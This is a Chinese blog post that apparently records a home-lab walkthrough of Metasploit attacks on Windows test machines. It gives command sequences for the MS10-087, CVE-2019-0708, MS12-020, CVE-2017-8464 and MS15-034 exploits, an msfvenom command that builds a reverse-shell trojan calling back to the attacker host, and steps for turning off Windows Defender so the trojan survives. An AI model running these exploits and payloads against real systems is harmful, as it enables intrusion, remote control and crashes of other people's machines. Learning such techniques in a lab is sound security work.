美文网首页
Msf攻击案例

Msf攻击案例

作者: JyinP | 来源:发表于2020-03-17 17:59 被阅读0次

    注意:所有攻击前先要管防火墙!

    msf 之ms10-087

    输入命令

    • search ms10-087;
    • 使用这个模块:
      Use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
      image.png
      看到一个文件

      改文件名
      image.png
      软件捆绑,设置payload: set payload windows/exec
      image.png
      调用cmd中的计算器
      image.png
      我们运行下,文件已经在这个路径下面了。
      image.png
      kail下面root文件显示隐藏文件✔
      image.png
      image.png
      root下→.msf4→local→pjy的木马文件放到桌面
      image.png
      把木马放到winxp中 点rtf文件计算器打开
      踩坑:复制的xp环境要重启一下才可以执行!!
      image.png
    msfCVE-2019-0708实例
    • 为实验成功先win7系统下关闭防火墙并开启3389端口


      image.png
      image.png
    • 如下命令操作

    search 2019-0708
    use 1
    show options(查看使用说明)
    set rdp_client_ip 192.168.117 (设置当前ip是被攻击的主机ip)


    image.png
    image.png

    show options
    set payload windows/x64/meterpreter/reverse_tcp #设置反向链接


    image.png

    set lhost 192.168.1.119
    set id 4


    image.png

    exploit
    set rhosts 192.168.1.117 (设置被攻击主机号)
    exploit
    check
    set target 1
    exploit (目标会蓝屏)成功导致被攻击的主机蓝屏

    image.png
    msfCVE-2019-0708实例
    • 先开启远程3389端口然后开始做攻击实验
      命令如下:

    ms12-020

    search ms12-020
    use 0
    set rhosts 192.168.1.124 (攻击2003系统)
    exploit(蓝屏)


    image.png
    震网三代
    • 漏洞详情
      北京时间2017年6月13日凌晨,微软官方发布6月安全补丁程序,“震网三代” LNK文件远程代码执行漏洞(CVE-2017-8464)和Windows搜索远程命令执行漏洞(CVE-2017-8543).
      CVE-2017-8543,当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。
      CVE-2017-8464,当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
      攻击机:kali
      IP地址为:192.168.10.118
      靶机:win7
      IP地址:192.168.10.119
      受影响的版本
      Windows 7
      Windows 8.1
      Windows RT 8.1
      Windows 10
      Windows Server 2008
      Windows Server 2008 R2
      Windows Server 2012
      Windows Server 2012 R2
      Windows Server 2016

    • ms 2017_8464

    search 2017_8464
    use 0
    show options
    set payload windows/meterpreter/reverse_tcp
    show options
    set lhost 192.168.1.117
    run/exploit

    生成很多快捷方式,找到快捷方式可以存到U盘,可以单独拷贝出来有漏洞。


    image.png
    image.png
    • kail木马生成使用

    命令如下:
    kail下操作
    kail:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.119 LPORT=4444 -f exe -o payload.exe(生成木马)


    image.png

    kail:sz payload.exe 下载木马到桌面,此处踩坑——木马被查杀。
    注意!踩坑:
    尽管关闭了防火墙,但是生成的木马病毒被win10系统自带的查杀病毒给消灭了,关闭方式如下。


    image.png
    image.png
    image.png
    image.png

    进入到msf下,
    1.开启监听444端口:

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.1.119
    set lport 4444
    exploit
    当win7下点击木马,就可以监听运行

    image.png
    ms15-034

    (windows2008系统下运行)
    现在windows sever 2008 r2 系统下安装iis 方法参考
    [win2008系统创建iis流程]https://www.jianshu.com/p/44c503ed447d

    image.png

    ms15-034
    search ms15-034
    use 0
    set rhosts 192.168.1.4(win2008系统ip) 出现蓝屏重启

    操作如下:
    设置iis


    image.png

    更改为ip自动获取


    image.png image.png

    相关文章

      网友评论

          本文标题:Msf攻击案例

          本文链接:https://www.haomeiwen.com/subject/iushjhtx.html